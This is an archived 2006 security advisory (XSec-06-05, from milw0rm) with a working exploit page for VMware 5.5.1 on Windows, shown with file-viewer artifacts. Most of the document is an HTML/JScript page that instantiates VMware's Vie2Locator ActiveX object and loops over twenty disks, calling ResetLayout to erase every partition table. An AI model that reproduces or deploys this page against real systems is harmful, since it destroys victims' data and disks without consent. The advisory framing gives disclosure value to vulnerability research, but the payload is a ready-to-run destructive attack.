65 lines
No EOL
1.6 KiB
HTML
65 lines
No EOL
1.6 KiB
HTML
<!--
|
|
|
|
[XSec-06-05]: VMware 5.5.1 for Windows arbitrary partition table delete issue.
|
|
|
|
Advisory ID:
|
|
XSec-06-05
|
|
|
|
Advisory Name:
|
|
VMware 5.5.1 for Windows arbitrary partition table delete issue.
|
|
|
|
Release Date:
|
|
08/16/2006
|
|
|
|
Tested on:
|
|
VMware 5.5.1 build-19175 on Windows Server 2000/2003
|
|
|
|
Affected version:
|
|
VMware 5.5.1
|
|
|
|
Author:
|
|
nop <nop#xsec.org>
|
|
http://www.xsec.org
|
|
|
|
Overview:
|
|
On running windows system, you can't delete, format and change system dirver. \
|
|
VMware register a COM Object use for Virtual Disk, but it's very danger. \
|
|
I don't know how to name this issue. If you allow unsafe ActiveX and jscript, \
|
|
and has VMware installed, the vmware.htm will delete all harddisk partition \
|
|
table on the windows system. please backup your partition table first.
|
|
|
|
Exploit:
|
|
|
|
=============== vmware.htm start ================
|
|
|
|
|
|
// VMware 5.5.1 for Windows arbitrary partition table delete issue.
|
|
// Tested on Windows Server 2000/2003
|
|
//
|
|
// nop nop#xsec.org
|
|
// http://www.xsec.org
|
|
//
|
|
|
|
// CLSID: {0F748FDE-0597-443C-8596-71854C5EA20A}
|
|
// Info: Vie2Locator Class
|
|
// ProgID: VieLib2.Vie2Locator.1
|
|
// InprocServer32: C:\Program Files\Common Files\VMware\VMware Virtual Image Editing\vielib.dll
|
|
|
|
-->
|
|
|
|
<html><body>
|
|
<object classid="clsid:{0F748FDE-0597-443C-8596-71854C5EA20A}" id="vmware"> </object>
|
|
<script>
|
|
|
|
var disk = 0; // HardDisk No
|
|
|
|
while (disk < 20)
|
|
{
|
|
var x = vmware.ConnectDisk(disk); // Connect to HardDisk
|
|
x.ResetLayout(); // Will clean all partition table on your Harddisk
|
|
disk += 1;
|
|
}
|
|
</script>
|
|
</body></html>
|
|
|
|
# milw0rm.com [2006-08-16] |